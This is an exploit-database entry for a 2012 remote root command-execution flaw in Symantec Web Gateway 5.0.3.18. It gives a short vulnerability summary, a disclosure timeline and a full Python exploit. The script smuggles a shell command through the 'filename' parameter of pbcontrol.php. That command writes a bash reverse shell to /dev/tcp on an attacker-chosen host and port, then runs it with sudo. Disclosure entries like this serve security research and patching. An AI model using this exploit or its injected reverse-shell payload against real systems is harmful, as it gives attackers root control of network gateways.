Symantec Web Gateway 5.0.3.18 pbcontrol.php ROOT RCE Exploit

vendor:

Symantec Web Gateway

by:

Offensive Security

7.5

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Symantec Web Gateway

Affected Version From: 5.0.3.18

Affected Version To: 5.0.3.18

Patch Exists: YES

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2012

Symantec Web Gateway 5.0.3.18 pbcontrol.php ROOT RCE Exploit

This exploit allows an attacker to execute arbitrary code on a vulnerable Symantec Web Gateway version 5.0.3.18. The exploit takes advantage of a vulnerability in the pbcontrol.php file, allowing the attacker to inject and execute their own code.

Mitigation:

Upgrade to a patched version of Symantec Web Gateway

Source

Exploit-DB raw data:

#!/usr/bin/python
import urllib
import sys

'''

print "[*] ##############################################################"
print "[*] Symantec Web Gateway 5.0.3.18 pbcontrol.php ROOT RCE Exploit"
print "[*] Offensive Security - http://www.offensive-security.com"
print "[*] ##############################################################\n"

# 06 Jun 2012: Vulnerability reported to CERT
# 08 Jun 2012: Response received from CERT with disclosure date set to 20 Jul 2012
# 26 Jun 2012: Email received from Symantec for additional information
# 26 Jun 2012: Additional proofs of concept sent to Symantec
# 06 Jul 2012: Update received from Symantec with intent to fix
# 20 Jul 2012: Symantec patch released: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00
# 23 Jul 2012: Public Disclosure

'''

if (len(sys.argv) != 4):
        print "[*] Usage: symantec-web-gateway-0day.py <RHOST> <LHOST> <LPORT>"
        exit(0)

rhost = str(sys.argv[1])
lhost = sys.argv[2]
lport = sys.argv[3]

payload= '''echo%20'%23!%2Fbin%2Fbash'%20%3E%20%2Ftmp%2FnetworkScript%3B%20echo%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F'''+lhost+'''%2F'''+lport+'''%200%3E%261'%20%3E%3E%20%2Ftmp%2FnetworkScript%3Bchmod%20755%20%2Ftmp%2FnetworkScript%3B%20sudo%20%2Ftmp%2FnetworkScript'''
url = 'https://%s/spywall/pbcontrol.php?filename=hola";%s;"&stage=0' % (rhost,payload)
urllib.urlopen(url)